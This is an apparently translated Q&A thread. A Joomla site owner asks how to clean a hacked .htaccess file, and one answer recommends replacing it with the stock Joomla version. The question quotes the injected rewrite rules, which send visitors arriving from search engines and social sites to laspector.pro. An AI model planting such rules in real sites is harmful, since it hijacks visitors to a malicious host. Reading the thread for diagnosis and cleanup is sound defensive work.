joomla - Joomla：寻求有关纠正 .htaccess 文件恶意软件问题的建议

Question

在这里寻求一些建议。

我运行一个基于（旧版本）Joomla 的网站和论坛。4 年来一切都很好，直到周末，用户开始收到来自防病毒软件的警告，表明该网站上存在恶意软件。

已运行 Google 网站管理员工具，它指出 .htaccess 文件中存在恶意软件。

果然，我可以看到 .htaccess 文件确实在恶意软件报告开始的那天早上更新了。我在这里阅读了其他一些 q，这表明这并不少见........而且我还阅读了一些建议，您可能需要也可能不需要 .ht 访问文件。

我发现的是这样的：

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^。(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog |live|myspace|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat |teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon |网络内容|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace).(. )
RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia |bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut |竞技场|thisisouryear|ukkey|uwe|朋友重聚|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|爱尔兰信息|kompass|startsiden |confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(. )
RewriteRule ^(.*)$ http://laspector.pro/cyrculate?8 [R=301,L]
/IfModule>
恶意软件检查提到的具体项目是 Laspector。

所以，我的问题是：

1. 我可以安全地删除 .htaccess 文件的 .content 或它的某个子集吗？
2. 我们甚至需要一个 .htaccess 文件吗？

该网站是开放访问（无需登录），论坛需要注册和登录，如果这是相关的。

感谢任何人都可以提供的任何建议。

Answer 1

如果您要使用 SEF 网址，则需要 .htaccess 文件。我知道它还有其他应用程序——它只是最常用的——所以是的，它们在这方面对 Joomla 很重要——尽管不是强制性的——如果你不使用其中的任何功能——你不需要它我不要想！

您应该绝对可以删除上面的所有内容。但是，我建议您将其替换为您使用的 Joomla 分支中的 .htaccess 文件！